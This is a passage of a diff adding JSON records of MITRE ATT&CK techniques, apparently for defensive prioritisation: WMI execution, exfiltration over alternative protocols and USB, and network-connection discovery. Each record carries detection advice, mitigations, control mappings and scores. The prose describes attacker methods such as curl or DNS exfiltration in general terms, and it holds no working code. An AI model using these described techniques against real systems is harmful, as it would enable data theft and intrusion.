+        "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)",
+        "url": "https://attack.mitre.org/techniques/T1047",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 2.183333333333333,
+        "adjusted_score": 2.183333333333333,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "RA-5",
+            "SC-3",
+            "SC-34",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.5333333333333333,
+            "mitigation_score": 0.45454545454545453,
+            "detection_score": 0.62
+        },
+        "choke_point_score": 0.65,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1048",
+        "name": "Exfiltration Over Alternative Protocol",
+        "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ",
+        "url": "https://attack.mitre.org/techniques/T1048",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1048.001",
+                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
+                "url": "https://attack.mitre.org/techniques/T1048/001",
+                "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    }
+                ]
+            },
+            {
+                "tid": "T1048.002",
+                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
+                "url": "https://attack.mitre.org/techniques/T1048/002",
+                "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
+                "mitigations": [
+                    {
+                        "mid": "M1057",
+                        "name": "Data Loss Prevention",
+                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                        "url": "https://attack.mitre.org/mitigations/M1057"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    }
+                ]
+            },
+            {
+                "tid": "T1048.003",
+                "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
+                "url": "https://attack.mitre.org/techniques/T1048/003",
+                "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
+                "mitigations": [
+                    {
+                        "mid": "M1057",
+                        "name": "Data Loss Prevention",
+                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                        "url": "https://attack.mitre.org/mitigations/M1057"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.520876359047619,
+        "adjusted_score": 0.520876359047619,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.6",
+            "7.7",
+            "9.2",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SA-8",
+            "SA-9",
+            "SC-28",
+            "SC-31",
+            "SC-46",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.419047619047619,
+            "mitigation_score": 0.6,
+            "detection_score": 0.22
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00182874
+    },
+    {
+        "tid": "T1048.001",
+        "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
+        "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ",
+        "url": "https://attack.mitre.org/techniques/T1048/001",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1048",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.31428571428571433,
+        "adjusted_score": 0.31428571428571433,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.6",
+            "7.7",
+            "9.2",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-46",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1048.002",
+        "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
+        "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ",
+        "url": "https://attack.mitre.org/techniques/T1048/002",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1048",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.41428571428571426,
+        "adjusted_score": 0.41428571428571426,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.6",
+            "7.7",
+            "9.2",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SA-8",
+            "SA-9",
+            "SC-28",
+            "SC-31",
+            "SC-46",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1048.003",
+        "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
+        "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
+        "url": "https://attack.mitre.org/techniques/T1048/003",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1048",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.5333333333333333,
+        "adjusted_score": 0.5333333333333333,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.6",
+            "7.7",
+            "9.2",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SA-8",
+            "SA-9",
+            "SC-13",
+            "SC-28",
+            "SC-31",
+            "SC-46",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1049",
+        "name": "System Network Connections Discovery",
+        "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".",
+        "url": "https://attack.mitre.org/techniques/T1049",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.17619047619047618,
+        "adjusted_score": 0.17619047619047618,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.07619047619047618,
+            "detection_score": 0.16
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1052",
+        "name": "Exfiltration Over Physical Medium",
+        "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
+        "url": "https://attack.mitre.org/techniques/T1052",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Drive: Drive Creation",
+            "File: File Access",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1052.001",
+                "name": "Exfiltration Over Physical Medium: Exfiltration over USB",
+                "url": "https://attack.mitre.org/techniques/T1052/001",
+                "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
+                "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+                "mitigations": [
+                    {
+                        "mid": "M1057",
+                        "name": "Data Loss Prevention",
+                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                        "url": "https://attack.mitre.org/mitigations/M1057"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1034",
+                        "name": "Limit Hardware Installation",
+                        "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
+                        "url": "https://attack.mitre.org/mitigations/M1034"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1034",
+                "name": "Limit Hardware Installation",
+                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
+                "url": "https://attack.mitre.org/mitigations/M1034"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "10.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "MP-7",
+            "RA-5",
+            "SA-8",
+            "SC-28",
+            "SC-41",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.2380952380952381,
+            "mitigation_score": 0.45454545454545453
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1052.001",
+        "name": "Exfiltration Over Physical Medium: Exfiltration over USB",
+        "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
+        "url": "https://attack.mitre.org/techniques/T1052/001",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Drive: Drive Creation",
+            "File: File Access",
+            "Process: Process Creation"
